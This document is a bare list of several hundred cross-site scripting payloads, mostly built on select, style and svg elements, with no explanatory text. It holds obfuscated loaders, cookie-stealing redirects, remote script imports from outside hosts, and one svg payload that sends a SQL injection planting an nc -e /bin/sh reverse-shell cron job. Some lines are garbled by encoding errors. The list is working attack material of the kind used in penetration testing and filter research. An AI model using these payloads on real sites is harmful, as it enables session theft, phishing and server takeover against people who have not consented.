- <select onchange=alert(106)><option>1<option>2
- <select onchange=alert(1)><option>1<option>2
- <select onclick=”popup=1;”>
- <select onclick=popup=1;>
- ‘></select><script>alert(123)</script>
- ‘></select><script>alert(123)</script>
- ‘></select><script>alert(XSS)</script>
- <set attributeName=”onmouseover” to=”alert(1)”/>
- <set attributeName=”xlink:href” to=”javascript:alert(1)” begin=”1s” />
- Set.constructor(‘ale’+’rt(13)’)();
- Set.constructor`alert\x28document.domain\x29```
- Set.constructor`al\x65rt\x2814\x29```;
- setImmediate()
- setinterval()
- setInterval(‘ale’+’rt(10)’);
- setInterval`alert\x28document.domain\x29`
- setInterval(code, 0)
- setInterval(‘location.hash=”??????????”[i++%10]’,i=99)
- setInterval(location.search.slice(1));
- setInterval(x,5000);
- setTimeout()
- setTimeout`alert(1);//${1000}`
- setTimeout(‘ale’+’rt(2)’);
- setTimeout([‘alert(/@garethheyes/)’]);
- setTimeout`alert\x28document.domain\x29`
- setTimeout([‘confirm(4)’]);
- setTimeout(location)
- setTimeout(location.search.slice(1));
- setTimeout// (name// ,0)
- setTimeout(URL.slice(-7))//#alert()
- <<! — #set var=”x” value=”svg onload=alert(54)” →<! — #echo var=”x” →>
- <ShowAbout>1</ShowAbout>
- <ShowDuration>1</ShowDuration>
- <ShowElapsedTime>1</ShowElapsedTime>
- <ShowFFRW>1</ShowFFRW>
- <ShowLoadingMov>1</ShowLoadingMov>
- Single Input (script-based)
- ?skinName=asfunction:getURL,javascript:alert(1)//”,
- /*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or’ /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/’or” /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/”? /*
- /*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or’ /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/’or” /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/”? /*
- <slideslow><image img=javascript:alert(XSS@%2Bdocument.domain caption= /></slideshow>
- <s[NULL]cript>confirm(1)</s[NULL]cript>’>Clickme</a>
- ;/script>
- <s/onclick=alert()>b
- source+location.hash[1]+1+location.hash[2]>#()
- source+location.hash.substr(1)>#(1)
- <source onclick=popup=1; ><frameset/onload=popup=1;>
- {“source”:{},”__proto__”:{“source”:”$`onerror=prompt(1)>”}}
- <source srcset=”x”><img onerror=”confirm(5)”></picture>
- Space Insertion##<script%20TEST>alert(1)</script%20TESTTEST>
- <span class=”pln”></span><span class=”tag”><formaction</span><span class=”pun”>=</span><span class=”atv”>&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;</span><span class=”tag”>><button></span><span class=”pln”>CLICK</span>
- <span class=”pln”> </span><span class=”tag”><formaction</span><span class=”pun”>=</span><span class=”atv”>&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;</span><span class=”tag”>><button></span><span class=”pln”>CLICK</span>
- <span class=”qm_ico_print” id=”mail_print” title=”L” onclick=”window.open(‘/cgi-bin/readmail?sid=SC_hEOi3h_nqEgJQ&’);”></span>
- <SPAN class=xmsw title=dd onmouseout=javascript:alert(document.cookie)>test</SPAN>
- <span class=”xmsw” title=”dd” onmouseout=window.location=’http://test/test.php?c='+document.cookie>test</span>
- <SPAN class=xmsw title=dd onmouseout=window.location=’http://www,xfydyt.com'>test</span>
- <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
- <span id=”x” data-constructor=oops></span><script>confirm(x.dataset.constructor)</script>
- <span onclick=”javascript:changeFont(2);”>
- <span/onmouseover=confirm(1)>renwax23
- “></span><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,120,46,99,111,47,120,105,72,118,62,60,47,115,99,114,105,112,116,62));</script><span>
- <SPAN “ style=”display: block; position: absolute; top: 0; left: 0; width: 9999px; height: 9999px; z-index: 9999" foo=”></span>renwax23
- SRC=
<IMG 6;avascript:alert('XSS')>
- ‘/src=[^<]*base64[^<]*(?=\>)/Uis’,
- “src=data:,alert%2823%29></script><script x=”
- SRC’” →<! — #exec cmd=”/bin/echo
- src=”http://www.site.com/XSS.js"></script>
- src=”http://www.site.com/XSS.js"></script>
- <sRCIpt>alert(/123/)</ScRpT>
- src=JaVaSCript:prompt(132)
- <s<script>cript>…</s</script>cript>
- [S] = stripped char or string
- sstyle=foobar”tstyle=”foobar”ystyle=”foobar”lstyle=”foobar”estyle=”foobar”=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=”
- {!/\s/.test(‘\u0085’)&&eval(‘\u0085alert(“IE”)’)}catch(e){alert(‘Not IE’)}
- stop, open, print && confirm(1)
- String.fromCharCode(0x61,0x62)
- String.fromCharCode(0xffff+0x3d)
- (String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41))
- String.raw(a=alert(1),1,2)
- String.raw`jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e`;
- <% string str_a = rrequest.getParameter(“a”);%>
- </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
- </style  ><script   :-(>/**/confirm(document.location)/**/</script   :-(
- “+style%3d”x%3aexpression(alert(1))+
- <STYLE>a{background:url(‘s1’ ‘s2)}@import javascript:javascript:alert(1);’);}</STYLE>
- /style=a:expression(/*'/-
- <STYLE><! — a{< img src=</STYLE>;x:expression(eval(myxsxxcd.title));<style>} →</style></DIV>
- <STYLE> a { width: expression(alert(‘XSS’)) } </STYLE>
- <style>*{background-image:url(‘\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29’)}</style><% style=behavior:url(: onreadystatechange=alert(1)>
- <style>body:after{content: ��\61\6c\65\72\74\28\31\29��}</style><script>eval(eval(document.styleSheets[0].cssRules[0].style.content))</script>
- <style>body{background-color:expression\(alert(1))}</style>
- <style>body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }</style>
- <style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo “<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead…<hr />”; phpinfo(); __halt_compiler(); ?></h1>
- <;STYLE>;BODY{-moz-binding:url(“;http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
- <STYLE>BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
- <style>BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss")}</style>
- <STYLE>BODY{-moz-binding:url(“http://xxxx.com/xssmoz.xml#xss")}</STYLE>
- <style>body{width:��xpression(parent.document.write(unescape(‘%3Cscript%20src%3Dhttp%3A//xssor.io/phishing/%3E%3C/script%3E’)));}</style>
- style=color: expression(alert(0));” a=”
- /style=[^<]*((expression\s*?[<]??)|(behavior\s*:))[^<]*(?=\>)/Uis
- /style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis
- ‘/style=[^<]*((expression\s*?\([^<]*?\))|(behavior\s*:))[^<]*(?=\>)/Uis’,
- <style>*{font-family:’Serif}’;x[value=expression(confirm(URL=1));]{color:red}</style>
- <style>img{background-image:url(‘javascript:alert(location)’)}</style>
- <style><img src=”</style><img src=x “><object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
- <style><img src=”</style><img src=x onerror=alert(1)//”>
- <style><img src=”</style><img src=x onerror=alert(123)//”>
- “<style><img src=’</style><img src=x onerror=alert(“document.cookie”)//’>
- <style><img src=”</style><img src=x onerror=alert(XSS)//”>
- <style><img src=”</style><img src=x onerror=javascript:alert(1)//”>
- <style>@import ‘//attacker/test.css’</style>
- <STYLE>@import’%(css)s’;</STYLE>
- <style>*[{}@import’%(css)s?]</style>X
- <style>@import “data:,*%7bx:expression(javascript:alert(1))%7D”;</style>
- <style>@import “data:,*%7bx:expression(write(1))%7D”;</style>
- <style>@import//evil? >>>steal me!<<< scriptless
- <;STYLE>;@import’;http://ha.ckers.org/xss.css';;<;/STYLE>;
- <STYLE>@import’http://ha.ckers.org/xss.css';</STYLE>
- <STYLE>@importhttp://ha.ckers.org/xss.css;</STYLE>;
- <STYLE>@import’http://host/css';</STYLE>
- <style>@import’http://www.securitycompass.com/xss.css';</style>
- <STYLE>@import’http://xss.cx/xss.css';</STYLE>
- <STYLE>@import’http://xxxx.com/xss.css';</STYLE>
- <STYLE>@importjavasc ipt:alert(“XSS”);</STYLE>
- <STYLE>@im\port’\ja\vasc\ript:alert(“X3SS”)’;</STYLE>
- <style>@im\port’\ja\vasc\ript:alert(“xss”)’;</style>
- <style>@import javascript:alert(xss);</style>
- <style>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</style>
- <style>@import’javascript:alert(“XSS”)’;</style>
- <;STYLE>;@im\port’;\ja\vasc\ript:alert(“;XSS”;)’;;<;/STYLE>;
- <STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</STYLE>
- <STYLE>@import’javascript:alert(“XSS”)’;</STYLE>
- “><STYLE>@import”javascript:alert(‘XSS’)”;</STYLE>
- “><STYLE>@import”javascript:alert(‘XSS’)”;</STYLE>>”’><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
- <STYLE>@im\port’\ja\vasc\ript:confirm(document.location)’;</STYLE>
- “><STYLE>@import”javascript:confirm(document.location)”;</STYLE>
- <style>@im\port’\ja\vasc\ript:document.vulnerable=true’;</style>
- <style>*[{}@import’test.css?]{color: green;}</style>X
- <style>@imp\ort url(“http://attacker.org/malicious.css");</style>
- <style>jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
- <style>@keyframes x{}</style>
- <style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
- <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=alert`1`> %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E “</script><script>alert(String.fromCharCode(88,83,83))</script> <IMG SRC=x onload=”alert(String.fromCharCode(88,83,83))”> <IMG SRC=x onafterprint=”alert(String.fromCharCode(88,83,83))”>
- <STYLE>li+{list-style-image:url(“javascript:alert(1)”);}</STYLE><UL><LI>1
- <;STYLE>;li {list-style-image: url(“;javascript:alert('XSS')”;);}<;/STYLE>;<;UL>;<;LI>;XSS
- <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’);</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:alert(XSS)”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS</br>
- <style>li {list-style-image: url(“javascript:document.vulnerable=true;”);</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url(“javascript:javascript:alert(1)”);}</STYLE><UL><LI>XSS
- <style/></style><img src=1 onerror=confirm(1)></style>
- style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=”
- <style>*{-o-link:’data:text/html,<svg/onload=confirm(5)>’;-o-link-source:current}</style><a href=1>aaa
- <style/onload=confirm(1)>
- <style/onload = !-confirm(1)>
- <style onload=’execScript(“InputBox+1”,”VbScript”);’>
- <style/onload=”javascript:if(‘[object Object]’=={}&&1==[1])confirm(1);”>
- <style/onload=<! — 	> alert (1)>
- <style/onload=<! — 	> confirm (1)>
- <style/onload=<! — > alert (1)>
- <style/onload=prompt(’XSS’)
- <style/onload=prompt(‘XSS’)
- <style onLoad style onLoad=”javascript:javascript:alert(1)”></style onLoad>
- <style onreadystatechange=javascript:javascript:alert(1);></style>
- <style onReadyStateChange style onReadyStateChange=”javascript:javascript:alert(1)”></style onReadyStateChange>
- <style>p[foo=bar{}*{-o-link:’javascript:alert(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
- <style>p[foo=bar{}*{-o-link:’javascript:confirm(1)’}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
- <style>p[foo=bar{}*{-o-link:’javascript:javascript:alert(1)’}{}*{-o-link-source:current}]{color:red};</style>
- }</style><script>a=eval;b=alert;a(b(/i/.source));</script>
- }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
- </style><script>a=eval;b=alert;a(b(/XSS/.source));</script><script>a=eval;b=alert;a(b(/XSS/.source));</script>’”><marquee><h1>XSS by vuolent python</h1></marquee>
- </style ><script :-(>/**/alert(document.location)/**/</script :-(
- </style></script><script>alert(0x000123)</script>
- ‘</style></script><script>alert(0x000123)</script>
- ‘\” →</style></script><script>alert(0x000123)</script>
- \”></style></script><script>alert(0x000123)</script>
- \”>’</style></script><script>alert(0x000123)</script>
- </style></scRipt><scRipt>alert(1)</scRipt>
- ‘“ →</style></scRipt><scRipt>alert(‘XSSPOS ED’)</scRipt>
- “ →</style></script><script>alert(“XSS”)</script>
- <///style///><span %2F onmousemove=’alert(1)’>SPAN
- <///style///><span %2F onmousemove=’confirm(1)’>SPAN
- <style><! — </style><script>alert(‘XSS’);// →</script>
- <style><! — </style><script>document.vulnerable=true;// →</script>
- <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- <style></style\x09<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style></style\x0A<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style></style\x0D<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style></style\x20<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style></style\x3E<img src=”about:blank” onerror=javascript:alert(1)//></style>
- <style>//<! — </style> →*{x:expression(alert(/@jackmasa/))}//<style></style>
- <style>//<! — </style> →*{x:expression(confirm(4))}//<style></style>
- <style>#test{x:expression(alert(/XSS/))}</style>
- </stYle/</titLe/</teXtarEa/</scRipt/ — !>
- <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘X7SS’)”)}</STYLE>
- <;STYLE type=”;text/css”;>;BODY{background:url(“;javascript:alert(‘;XSS’;)”;)}<;/STYLE>;
- <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- <STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- <STYLE type=”text/css”>BODY{background:url(“javascript:alert(XSS)”)}</STYLE>
- <STYLE type=”text/css”>BODY{background:url(“javascript:confirm(document.location)”)}</STYLE>
- <style type=”text/css”>BODY{background:url(“javascript:document.vulnerable=true”)}</style>
- <STYLE type=”text/css”>BODY{background:url(“javascript:javascript:alert(1)”)}</STYLE>
- <style type=text/css>@import url(http://www.xxx.com/xss.css);</style>
- <STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘X6SS’)”);}</STYLE><A CLASS=XSS></A>
- <STYLE TYPE=”text/css”>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
- <STYLE TYPE=”text/javascript”>alert(‘X4SS’);</STYLE>
- <STYLE TYPE=”text/javascript”>alert(“XSS”)
- <;STYLE TYPE=”;text/javascript”;>;alert(‘;XSS’;);<;/STYLE>;
- <STYLE TYPE=”text/javascript”>alert(‘XSS’);</STYLE>
- <STYLE TYPE=”text/javascript”>alert(XSS);</STYLE>
- <STYLE TYPE=”text/javascript”>confirm(document.location);</STYLE>
- <style type=”text/javascript”>document.vulnerable=true;</style>
- <style TYPE=”text/javascript”>document.vulnerable=true;</style>
- <STYLE TYPE=”text/javascript”>javascript:alert(1);</STYLE>
- <STYLE>width:expression(alert(‘anyunix’));</STYLE>
- <style>*{x:���A����������������(javascript:alert(1))}</style>
- <style>*{x:A(javascript:alert(1))}</style>
- <style>*{x:A(write(1))}</style>
- <style>#x{display:block}#x:target{display:none}@keyframes test {}</style>
- <// style=x:expression\28javascript:alert(1)\29>
- <// style=x:expression\28write(1)\29>
- <// style=x:expression\28write(1)\29>
- </**/style=x:expression\28write(1)\29>
- <// style=x:expression\28write(1)\29> // Works up to IE7; see http://html5sec.org/#71
- <style>//*{x:expression(alert(/xss/))}//<style></style>
- <;STYLE>;.XSS{background-image:url(“;javascript:alert(‘;XSS’;)”;);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
- <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
- <STYLE>.XSS{background-image:url(“javascript:alert(XSS)”);}</STYLE><A CLASS=XSS></A>
- <STYLE>.XSS{background-image:url(“javascript:confirm(document.location)”);}</STYLE><A CLASS=XSS></A>
- <style>.XSS{background-image:url(“javascript:document.vulnerable=true”);}</STYLE><A CLASS=XSS></a>
- <STYLE>.XSS{background-image:url(“javascript:javascript:alert(1)”);}</STYLE><A CLASS=XSS></A>
- style=\”xss:’” onclick=”alert(1)//’”
- style=xss:’”/onclick=alert(1)//’
- {{(_=’’.sub).call.call({}[$=’constructor’].getOwnPropertyDescriptor(_.__proto__,$).value,0,’alert(1)’)()}}
- {{(_=””.sub).call.call({}[$=”constructor”].getOwnPropertyDescriptor(_.__proto__,$).value,0,”alert(1)”)()}}
- <svg
- <svg%09%0A%0B%0C%0D%A0%00%20onload
- <svg%09%28%3Bonload=confirm(1);>
- <svg %09onload%09=prompt(1)>
- <svg%0Ao%00nload=%09((pro\u006dpt))()//
- <svg%20onload=eval%28%27/*%27%2bURL%29>#*/alert%28document.domain%29
- <svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
- <svg%20onload=evt.target.innerHTML=evt.target.ownerDocument.URL>#<img src=/ onerror=alert(domain)>
- <svg[9,10,12,13,32,47]onload=alert(1)>
- <svg><animate attributename=x end=180 onend=alert(180)>
- <svg><animate attributename=x end=188 onend=alert(188)>
- <svg><animate attributename=x end=1 onend=alert(44)>
- <svg><animate attributeName=x onbegin=alert(190)>
- <svg><animate href=#k attributename=href to=/ from=data:,alert(60)><script/id=k></script>
- <svg><animate onbegin=alert(189)>
- <svg><animate onbegin=alert(45)> <svg><animate attributeName=x onbegin=alert(450)>
- <svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
- <svg><animation x:href=javascript:alert(1)>
- “><svg/a=#”onload=’/*#*/prompt(1)’
- <svg><a><rect width=100% height=100%>
- <svg><a><rect width=100% height=100%><animate attributeName=href from=//google.com to=?>
- <svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>
- <svg><a><rect width=100% height=100% /><animate attributeName=href to=javascript:alert(1)>
- <svg><a><rect width=100% height=100%><animate attributeName=width from=0 to=100% dur=2s>
- <svg><a><script>alert(1)</a>
- <svg><a xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/>click</a></svg>
- <svg><a xml:base=”javascript:alert(1)//” href=”#”><circle r=”100" /></svg>
- <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate
- <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(176) to=&>
- <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
- <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
- <svg><![CDATA[><image xlink:href=”]]><img src=xx:x onerror=alert(2)//”></svg>
- <svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”</svg>
- <svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”></svg>
- <Svg> <! [CDATA [> <imagexlink: href = “]]> <img / src = xx: xonerror = alert (2) //”> </ svg>
- <svg><![CDATA[><imagexlink:href=”]]><img/src=xx:xonerror=alert(2)//”></svg> // By Secalert
- <svg contentScriptType=text/vbs><script>
- <svg contentScriptType=text/vbs><script>MsgBox
- <svg contentScriptType=text/vbs><script>MsgBox+1
- <svg contentScriptType=text/vbs><script>MsgBox”1"<i>
- <svg contentScriptType=text/vbs><script>XSS
- <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
- <svg><div onactivate=alert(‘Xss’)
- <svg><div onactivate=alert(‘Xss’) id=xss style=overflow:scroll>
- <svg><doh onload=confirm(1)>
- <svgEonload=alert(1)>
- <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
- <svg id=1 onload=confirm(1)>
- <svg id=alert(1337) onload=eval(id)>
- <svg id=alert(1) onload=eval(id)>
- <svg id=javascript:alert(1337) onload=location=id>
- <svg id=?p=<script/src=//3237054390/1%2B onload=location=id>
- <svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
- <svg id=t:alert(1) name=javascrip onload=location=name+id>
- <svg><image x:href=”data:image/svg-xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”>
- <svg><image x:href=”data:image/svg-xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’confirm(1)’%3E%3C/svg%3E”>
- <svg/language=vbs onload=msgbox-1
- <svg onclick=popup=1;>
- <svg/onload%0B=prompt(1)>
- <SVG/ONLOAD=prompt(1)
- <SVG/ONLOAD=prompt(1) // Cross Browser
- <svg </onload =”1> (_=alert,_(1)) “”>
- <svg </onload =”1> (_=alert,_(1337)) “”>
- <svg/onload=%26%23097lert%26lpar;1337)>
- <SVG ONLOAD=alert(1)>
- <SVG ONLOAD=alert(186)>
- <SVG ONLOAD=alert(47)>
- <svg+onload=+”aler%25%37%34(1)”
- <! →<svg onload=alert(1)> →
- <svg onload=”alert(1)”
- <svg onload=alert`1`>
- <svg onload=alert(1)>
- <svg onload=alert(1)//
- <svg/onload=alert(1)
- ?�֡�svg onload��alert�]1�^��
- “><svg onload=alert(1)>
- “><svg onload=alert(1)//
- \<svg/onload=alert`1`\>
- <Svg OnLoad=alert(1)>
- ?�֡�svg onload��alert�]183�^��
- <svg onload=(alert)(1) >//INJECTX
- <svg/onload=alert(1)>//INJECTX
- <svg onload=alert(1)>
- ‘<’s’v’g’ o’n’l’o’a’d’=’a’l’e’r’t’(‘7’)’ ‘>’
- <svg onload=alert(75)>
- “><svg onload=alert(76)//
- <svg/onload=alert(domain)>
- <svg/onload=alert`INJECTX`>
- <svg/onload=alert(`INJECTX`)>
- <svg/onload=alert(/INJECTX/)>
- <svg onload=alert(1)>
- <svg onload=alert(navigator.battery.charging)>
- <svg onload=alert(navigator.battery.dischargingTime)>
- <svg onload=alert(navigator.battery.level)>
- <svg onload=alert(navigator.connection.type)>
- <svg/onload=alert(String.fromCharCode(88,83,83))>
- “><svg/onload=alert(String.fromCharCode(88,83,83))>
- <svg onload=alert(tagName)>
- <svg onload=alert(1)>
- <svg onload=alert(‘XSS’)>
- <svg/onload=alert(‘XSS’)>
- “><svg/onload=alert(/XSS/)
- <svg/onload=body[name]=URL%0d#</svg><img src=x onerror=alert(1)>”
- <svg/onload=confirm(0);prompt(0);>
- “<svg/onload=confirm(0);prompt(0);>”
- <svg onload=confirm(1)
- <svg/onload=confirm(1)
- “><svg/onload=confirm(58)>”@x.y
- <svg onload=”confirm(7)”>
- “><svg onload=”confirm(7)”>
- “/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>
- “\”/><svg/onload=confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83));prompt(0)>”
- “><svg/onload=co\u006efir\u006d`1`>
- <svg+onload=+”[DATA]”
- <svg/onload=document.location.href=’data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=’>
- <svg/onload=document.location.href=’https://google.com'>
- <svg onload=document.writeln(decodeURI(location.hash))>#<img src=1 onerror=alert(1)>
- <svg onload=document.write(‘XSS’)>
- <svg/onload=eval(atob(location.hash.slice(1)))>
- <svg/onload=eval(atob(location.hash.slice(1)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
- <svg/onload=eval(atob(location.hash.slice(1)))>#YWxlcnQoMSkvLw==
- <svg/onload=eval(atob(URL.slice(-148)))>
- <svg/onload=eval(atob(URL.slice(-148)))>#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZWF0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNvdXJjZSk=
- <svg onload=eval(document.cookie)>
- <svg onload=eval(location.hash.slice(1)>#alert(1)
- <svg/onload=eval(location.hash.slice(1))>?#alert(1)
- <svg/onload=eval(location.hash.slice(1))>#with(document)
- <svg/onload=eval(location.hash.slice(1))>#with(document)body.appendChild(createElement(‘script’)).src=’//DOMAIN’
- <svg+onload=eval(location.hash.substr(1))>#alert(1)
- <svg/onload=eval(name)>
- <svg onload=eval(URL)>
- <svg onload=eval(URL)>//22
- <svg onload=eval(‘/*’+URL)>#*/alert(document.domain)
- <svg+onload=eval(URL.slice(7,15))>
- <svg/onload=eval(URL.slice(-7))//#alert()
- <svg onload=eval(URL.slice(-8))>#alert(1)
- <svg onload=eval(URL.slice(-8))>#alert(1)/”’></script /K><Svg /onload = confirm(`1`)
- <svg onload=eval(window.name)>
- <svg onload=eval(window.name)//
- <svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/U R/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>
- <svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/UR/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>
- <svg onload=fetch(“//HOST/?id=0+union+select’*+*+*+*+*+root+/bin/nc+-lp53+-e+/bin/sh’into+outfile’/etc/cron.d/s’”)>
- <svg onload=innerHTML=location.hash>#<script>alert(1)</script>
- <svg/onload=’javascript0x00:void(0)%00?void(0):confirm(1)’>
- <svg onload=”javascript:alert(123)” xmlns=”#”></svg>
- <svg onload=”javascript:alert(1)” xmlns=”http://www.w3.org/2000/svg"></svg>
- <svg onload=”javascript:alert(9)” xmlns=”http://www.w3.org/2000/svg"></svg>
- <svg onload=��javascript:alert(9)�� xmlns=��http://www.w3.org/2000/svg��></svg>
- <svg/onload=location=’javas’%2B’cript:’%2B
- <svg/onload=location=javas%2Bcript:%2B
- <svg onload=location=’javascript:alert(1)’>
- <svg/onload=location=’javascript:alert(1)’>
- <svg onload=location=’javas’+’cript:’+’ale’+’rt’+location.hash.substr(1)>#(1)
- <svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:
- <svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]#:()
- <svg/onload=location=/javas/.source%2B/cript:/.source%2B
- <svg/onload=location=/javas/.source%2B/cript:/.source%2B/ale/.source
- <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/.
- <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/.
- <svg onload=location=location.hash.substr(1)>#javascript:alert(1)
- <svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
- <svg/onload=location=name//>
- <svg/onload=location=name//
- <svg/onload=location=name//>CLICK</a>
- <svg/onload=location=name//��>CLICK</a>
- <svg+onload=location=URL.slice(7,26)>
- <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
- <svg onload=navigator.vibrate(500)>
- <svg onload=navigator.vibrate([500,300,100])>
- <svg/onload=parent[/loca/.source%2b/tion/.source]=name//
- <svg onload=popup=1;>
- <svg/onload=prompt(0);>
- “<svg/onload=prompt(0);>”
- <svg/onload=prompt(1);>
- <svg/onload=prompt(1)
- — !><svg/onload=prompt(1)
- “><svg/onload=prompt(1)>
- ><svg/onload=prompt(Xss)>
- ��><svg/onload=prompt(��Xss��)>
- “/><svg/onload=(prompt)(/XSS/)>#
- ><svg/onload=prompt(Xss-By-Muhaddi)>
- <svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
- ><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>
- “<svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>”
- “\”><svg/onload=prompt(/XSS/.source);prompt(0);confirm(0);confirm(0);>”,
- “><svg onload=”prompt(/xss/)”></svg>
- <svg onload=setInterval(function(){d=document;
- <svg onload=setInterval(function(){with(document)body.
- <svg/onload=setInterval(function(){with(document)body.
